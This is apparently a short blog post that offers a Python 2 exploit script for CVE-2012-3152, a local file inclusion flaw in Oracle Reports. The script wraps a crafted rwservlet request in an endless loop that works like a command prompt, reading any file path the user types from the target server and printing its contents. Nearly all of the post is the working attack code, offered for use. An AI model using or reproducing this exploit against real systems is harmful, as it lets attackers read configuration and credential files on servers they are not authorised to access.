This quick snippet of code exploits CVE-2012-3152 Oracle Reports Local File Inclusion (LFI) vulnerability.  To more easily interact with the vulnerable system the HTTP request exploiting the LFI is wrapped in an endless loop that feels like a command prompt.  Here is a good write-up on the actual vulnerability.  For this script we threw in a dash of color to the shell-like ouput using the Python module “termcolor” – Download here.


#!/usr/bin/python
import sys, urllib2    # Import the required modules for the vulnerability
from termcolor import colored   # Need to download python module "termcolor"

if len(sys.argv) != 2:    # Checks to make sure that a URL was supplied as a sys argument "<script> <URL>"
  print "Usage: "+sys.argv[0]+" <URL>"
  sys.exit(0)

URL=sys.argv[1]        # Assigns URL variable and prints out message
print "[+] Attempting CVE-2012-3152 - Oracle Reports LFI"

while True:        # Endless loop printing out a "~$ " and getting user input via "raw_input" to the command variable
  resource=raw_input(colored("~$ ", "red"))
  req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///'+resource+'"'
  try:                    # Sets up a Try/Except loop so exceptions are handled cleanly
    response=urllib2.urlopen(URL+req)
    # Sends request and prints the response
    for line in response.readlines():
      print line.strip()
  except Exception as e: print e

cve_2012_3152